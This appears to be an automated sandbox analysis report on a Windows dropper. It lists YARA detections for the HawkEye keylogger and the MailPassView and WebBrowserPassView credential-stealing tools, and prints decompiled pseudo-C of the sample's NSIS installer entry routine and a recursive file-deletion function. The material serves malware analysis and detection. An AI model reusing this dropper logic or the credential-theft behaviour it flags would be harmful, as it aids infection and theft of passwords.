                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000002C.00000002.921256513.00000000076B0000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000002.916420859.0000000002881000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000002.916420859.0000000002881000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000002.916420859.0000000002881000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                              Chronological Activities

                                                                                              Disassembly

                                                                                              Code Analysis

                                                                                              Reset < >

                                                                                                Analysis Process: xxTzyGLZx5.exe PID: 6780 Parent PID: 6128 xxTzyGLZx5.exeCOMMON

                                                                                                Executed Functions

                                                                                                Function 004030E3, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270filestringcomCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 83%
                                                                                                			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				intOrPtr _t71;
				intOrPtr _t77;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				intOrPtr _t113;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x42ec18 = _t34;
				 *0x42eb64 = E00405C49(8);
				SHGetFileInfoA(0x428f90, 0,  &_v360, 0x160, 0); // executed
				E0040592B("jpfyweowskz Setup", "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\jones\\Desktop\\xxTzyGLZx5.exe\" ";
				E0040592B(_t96, _t39);
				 *0x42eb60 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\jones\\Desktop\\xxTzyGLZx5.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00434001;
				}
				_t44 = CharNextA(E00405449(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E00405449(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								_t45 = _t44 + 2;
								__eflags = _t44 + 2;
								E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t45);
								L20:
								_t105 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004030AF(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C0B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E00403464();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x42ebf4; // 0x0
											if(__eflags != 0) {
												_t106 = E00405C49(3);
												_t100 = E00405C49(4);
												_t55 = E00405C49(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x42ec0c; // 0xffffffff
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E004051EC(_v408, 0x200010);
										ExitProcess(2);
									}
									_t113 =  *0x42eb7c; // 0x0
									if(_t113 == 0) {
										L31:
										 *0x42ec0c =  *0x42ec0c | 0xffffffff;
										_v400 = E00403489();
										goto L32;
									}
									_t103 = E00405449(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										_t101 = "C:\\Users\\jones\\Desktop";
										if(lstrcmpiA(_t105, "C:\\Users\\jones\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t101);
										}
										E0040592B(0x42f000, _v396);
										 *0x42f400 = 0x41;
										_t98 = 0x1a;
										do {
											_t71 =  *0x42eb70; // 0x5ff628
											E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t71 + 0x120)));
											DeleteFileA(0x428b90);
											if(_v416 != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\xxTzyGLZx5.exe", 0x428b90, 1) != 0) {
												_push(0);
												_push(0x428b90);
												E00405679();
												_t77 =  *0x42eb70; // 0x5ff628
												E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t77 + 0x124)));
												_t79 = E0040518B(0x428b90);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x42f400 =  *0x42f400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E00405679();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E004054FF(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004030AF(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}









































                                                                                                0x004030ef
                                                                                                0x004030f3
                                                                                                0x004030fb
                                                                                                0x004030fd
                                                                                                0x00403102
                                                                                                0x0040310d
                                                                                                0x00403114
                                                                                                0x0040311c
                                                                                                0x00403126
                                                                                                0x0040313c
                                                                                                0x0040314c
                                                                                                0x00403151
                                                                                                0x00403157
                                                                                                0x0040315e
                                                                                                0x00403171
                                                                                                0x00403176
                                                                                                0x00403178
                                                                                                0x0040317a
                                                                                                0x0040317f
                                                                                                0x0040317f
                                                                                                0x0040318f
                                                                                                0x00403195
                                                                                                0x004031fe
                                                                                                0x004031fe
                                                                                                0x00403200
                                                                                                0x00403202
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040319b
                                                                                                0x0040319e
                                                                                                0x004031a6
                                                                                                0x004031a6
                                                                                                0x004031a9
                                                                                                0x004031ae
                                                                                                0x004031b0
                                                                                                0x004031b0
                                                                                                0x004031b1
                                                                                                0x004031b1
                                                                                                0x004031b6
                                                                                                0x004031b9
                                                                                                0x004031ee
                                                                                                0x004031f3
                                                                                                0x004031f8
                                                                                                0x004031fb
                                                                                                0x004031fd
                                                                                                0x004031fd
                                                                                                0x004031fd
                                                                                                0x00000000
                                                                                                0x004031bb
                                                                                                0x004031bb
                                                                                                0x004031bc
                                                                                                0x004031bf
                                                                                                0x004031c7
                                                                                                0x004031ca
                                                                                                0x004031cc
                                                                                                0x004031cc
                                                                                                0x004031cc
                                                                                                0x004031ca
                                                                                                0x004031cf
                                                                                                0x004031d5
                                                                                                0x004031dd
                                                                                                0x004031e0
                                                                                                0x004031e2
                                                                                                0x004031e2
                                                                                                0x004031e2
                                                                                                0x004031e0
                                                                                                0x004031e5
                                                                                                0x004031ec
                                                                                                0x00403206
                                                                                                0x00403209
                                                                                                0x00403209
                                                                                                0x00403212
                                                                                                0x00403217
                                                                                                0x00403217
                                                                                                0x00403222
                                                                                                0x00403228
                                                                                                0x0040322d
                                                                                                0x0040322f
                                                                                                0x00403251
                                                                                                0x00403256
                                                                                                0x0040325d
                                                                                                0x00403264
                                                                                                0x00403268
                                                                                                0x004032cf
                                                                                                0x004032cf
                                                                                                0x004032d4
                                                                                                0x004032de
                                                                                                0x004033c9
                                                                                                0x004033cf
                                                                                                0x004033da
                                                                                                0x004033e3
                                                                                                0x004033e5
                                                                                                0x004033ea
                                                                                                0x004033ec
                                                                                                0x004033ee
                                                                                                0x004033f0
                                                                                                0x004033f2
                                                                                                0x004033f4
                                                                                                0x004033f6
                                                                                                0x00403406
                                                                                                0x00403408
                                                                                                0x0040340a
                                                                                                0x00403417
                                                                                                0x00403426
                                                                                                0x0040342e
                                                                                                0x00403436
                                                                                                0x00403436
                                                                                                0x0040340a
                                                                                                0x004033f6
                                                                                                0x004033f2
                                                                                                0x0040343b
                                                                                                0x00403441
                                                                                                0x00403443
                                                                                                0x00403447
                                                                                                0x00403447
                                                                                                0x00403443
                                                                                                0x0040344c
                                                                                                0x00403451
                                                                                                0x00403454
                                                                                                0x00403456
                                                                                                0x00403456
                                                                                                0x0040345e
                                                                                                0x0040345e
                                                                                                0x004032ed
                                                                                                0x004032f4
                                                                                                0x004032f4
                                                                                                0x0040326a
                                                                                                0x00403270
                                                                                                0x004032bf
                                                                                                0x004032bf
                                                                                                0x004032cb
                                                                                                0x00000000
                                                                                                0x004032cb
                                                                                                0x00403279
                                                                                                0x00403286
                                                                                                0x0040327d
                                                                                                0x00403283
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403285
                                                                                                0x00403285
                                                                                                0x00403285
                                                                                                0x0040328a
                                                                                                0x0040328c
                                                                                                0x00403294
                                                                                                0x00403300
                                                                                                0x00403305
                                                                                                0x00403314
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403318
                                                                                                0x0040331f
                                                                                                0x00403325
                                                                                                0x0040332b
                                                                                                0x00403333
                                                                                                0x00403333
                                                                                                0x00403341
                                                                                                0x00403348
                                                                                                0x00403351
                                                                                                0x00403357
                                                                                                0x00403357
                                                                                                0x00403363
                                                                                                0x00403369
                                                                                                0x00403373
                                                                                                0x00403387
                                                                                                0x00403388
                                                                                                0x00403389
                                                                                                0x0040338e
                                                                                                0x0040339a
                                                                                                0x004033a0
                                                                                                0x004033a7
                                                                                                0x004033aa
                                                                                                0x004033b0
                                                                                                0x004033b0
                                                                                                0x004033a7
                                                                                                0x004033b4
                                                                                                0x004033ba
                                                                                                0x004033ba
                                                                                                0x004033bd
                                                                                                0x004033be
                                                                                                0x004033bf
                                                                                                0x00000000
                                                                                                0x004033bf
                                                                                                0x00403296
                                                                                                0x00403298
                                                                                                0x004032a3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004032ab
                                                                                                0x004032b6
                                                                                                0x004032bb
                                                                                                0x00000000
                                                                                                0x004032bb
                                                                                                0x00403237
                                                                                                0x00403243
                                                                                                0x00403248
                                                                                                0x0040324d
                                                                                                0x0040324f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040324f
                                                                                                0x00000000
                                                                                                0x004031ec
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004031a0
                                                                                                0x004031a0
                                                                                                0x004031a0
                                                                                                0x004031a1
                                                                                                0x004031a1
                                                                                                0x00000000
                                                                                                0x004031a0
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • #17.COMCTL32 ref: 00403102
                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 0040310D
                                                                                                • OleInitialize.OLE32(00000000), ref: 00403114
                                                                                                  • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                                                                  • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                                                                                  • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                                                                • SHGetFileInfoA.SHELL32(00428F90,00000000,?,00000160,00000000,00000008), ref: 0040313C
                                                                                                  • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,jpfyweowskz Setup,NSIS Error), ref: 00405938
                                                                                                • GetCommandLineA.KERNEL32(jpfyweowskz Setup,NSIS Error), ref: 00403151
                                                                                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 00403164
                                                                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000020), ref: 0040318F
                                                                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403222
                                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403237
                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403243
                                                                                                • DeleteFileA.KERNELBASE(1033), ref: 00403256
                                                                                                • OleUninitialize.OLE32(00000000), ref: 004032D4
                                                                                                • ExitProcess.KERNEL32 ref: 004032F4
                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000,00000000), ref: 00403300
                                                                                                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000,00000000), ref: 0040330C
                                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403318
                                                                                                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040331F
                                                                                                • DeleteFileA.KERNEL32(00428B90,00428B90,?,0042F000,?), ref: 00403369
                                                                                                • CopyFileA.KERNEL32 ref: 0040337D
                                                                                                • CloseHandle.KERNEL32(00000000,00428B90,00428B90,?,00428B90,00000000), ref: 004033AA
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033FF
                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 0040343B
                                                                                                • ExitProcess.KERNEL32 ref: 0040345E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\xxTzyGLZx5.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\xxTzyGLZx5.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$jpfyweowskz Setup$~nsu.tmp
                                                                                                • API String ID: 2278157092-1661137418
                                                                                                • Opcode ID: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                                                                                • Instruction ID: aabb0dff5c64eb2fc36eb922ef2e6ed89ac062b0c308e186071ee6cedd25840a
                                                                                                • Opcode Fuzzy Hash: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                                                                                • Instruction Fuzzy Hash: F491E370908740AEE7216FA2AD49B6B7E9CEB0570AF04047FF541B61D2C77C9E058B6E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00405250, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E00405250(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004054FF(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x42ebe8 =  *0x42ebe8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E0040592B(0x42afe0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405465(_t72);
					} else {
						lstrcatA(0x42afe0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x42afe0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405449( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E0040592B(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E004055E3(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404CC9(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x42ebe8 =  *0x42ebe8 + 1;
										} else {
											E00404CC9(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E00405679();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405250(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x42afe0 - 0x5c;
					if( *0x42afe0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405C22(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E0040541E(_t72);
							E004055E3(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404CC9(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404CC9(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E00405679();
						}
						L33:
						 *0x42ebe8 =  *0x42ebe8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                                0x0040525b
                                                                                                0x0040525f
                                                                                                0x00405268
                                                                                                0x0040526b
                                                                                                0x0040526e
                                                                                                0x00405276
                                                                                                0x00405278
                                                                                                0x00405279
                                                                                                0x00000000
                                                                                                0x00405279
                                                                                                0x00405288
                                                                                                0x00405288
                                                                                                0x0040528b
                                                                                                0x0040528e
                                                                                                0x004052a2
                                                                                                0x004052a9
                                                                                                0x004052ae
                                                                                                0x004052b0
                                                                                                0x004052c0
                                                                                                0x004052b2
                                                                                                0x004052b8
                                                                                                0x004052b8
                                                                                                0x004052c5
                                                                                                0x004052c8
                                                                                                0x004052d3
                                                                                                0x004052d9
                                                                                                0x004052de
                                                                                                0x004052ee
                                                                                                0x004052f0
                                                                                                0x004052f6
                                                                                                0x004052f9
                                                                                                0x004052fc
                                                                                                0x004053b9
                                                                                                0x004053b9
                                                                                                0x004053bd
                                                                                                0x004053bf
                                                                                                0x004053bf
                                                                                                0x004053bf
                                                                                                0x004053bf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405302
                                                                                                0x00405302
                                                                                                0x0040530b
                                                                                                0x00405311
                                                                                                0x00405316
                                                                                                0x00405319
                                                                                                0x0040531b
                                                                                                0x0040531f
                                                                                                0x00405321
                                                                                                0x00405321
                                                                                                0x0040531f
                                                                                                0x00405324
                                                                                                0x00405327
                                                                                                0x0040533a
                                                                                                0x0040533c
                                                                                                0x00405341
                                                                                                0x00405348
                                                                                                0x00405360
                                                                                                0x00405366
                                                                                                0x0040536c
                                                                                                0x0040536e
                                                                                                0x00405393
                                                                                                0x00405370
                                                                                                0x00405370
                                                                                                0x00405374
                                                                                                0x00405388
                                                                                                0x00405376
                                                                                                0x00405379
                                                                                                0x0040537e
                                                                                                0x00405380
                                                                                                0x00405381
                                                                                                0x00405381
                                                                                                0x00405374
                                                                                                0x0040534a
                                                                                                0x00405350
                                                                                                0x00405352
                                                                                                0x00405358
                                                                                                0x00405358
                                                                                                0x00405352
                                                                                                0x00000000
                                                                                                0x00405348
                                                                                                0x00405329
                                                                                                0x0040532c
                                                                                                0x0040532e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405330
                                                                                                0x00405332
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405334
                                                                                                0x00405338
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405398
                                                                                                0x004053a2
                                                                                                0x004053a8
                                                                                                0x004053a8
                                                                                                0x004053b3
                                                                                                0x00000000
                                                                                                0x004053b3
                                                                                                0x004052ca
                                                                                                0x004052d1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405290
                                                                                                0x00405290
                                                                                                0x00405292
                                                                                                0x004053c3
                                                                                                0x004053c6
                                                                                                0x004053c9
                                                                                                0x0040541b
                                                                                                0x0040541b
                                                                                                0x0040541b
                                                                                                0x004053cb
                                                                                                0x004053ce
                                                                                                0x004053d9
                                                                                                0x004053de
                                                                                                0x004053e0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004053e3
                                                                                                0x004053e9
                                                                                                0x004053ef
                                                                                                0x004053f5
                                                                                                0x004053f7
                                                                                                0x00000000
                                                                                                0x00405413
                                                                                                0x004053f9
                                                                                                0x004053fd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405402
                                                                                                0x00405407
                                                                                                0x00405408
                                                                                                0x00000000
                                                                                                0x00405409
                                                                                                0x004053d0
                                                                                                0x004053d0
                                                                                                0x00000000
                                                                                                0x004053d0
                                                                                                0x00405298
                                                                                                0x0040529c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040529c

                                                                                                APIs
                                                                                                • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 0040526E
                                                                                                • lstrcatA.KERNEL32(0042AFE0,\*.*,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 004052B8
                                                                                                • lstrcatA.KERNEL32(?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 004052D9
                                                                                                • lstrlenA.KERNEL32(?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 004052DF
                                                                                                • FindFirstFileA.KERNEL32(0042AFE0,?,?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 004052F0
                                                                                                • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004053A2
                                                                                                • FindClose.KERNEL32(?), ref: 004053B3
                                                                                                Strings
                                                                                                • \*.*, xrefs: 004052B2
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405250
                                                                                                • "C:\Users\user\Desktop\xxTzyGLZx5.exe" , xrefs: 0040525A
                                                                                                Memory Dump Source
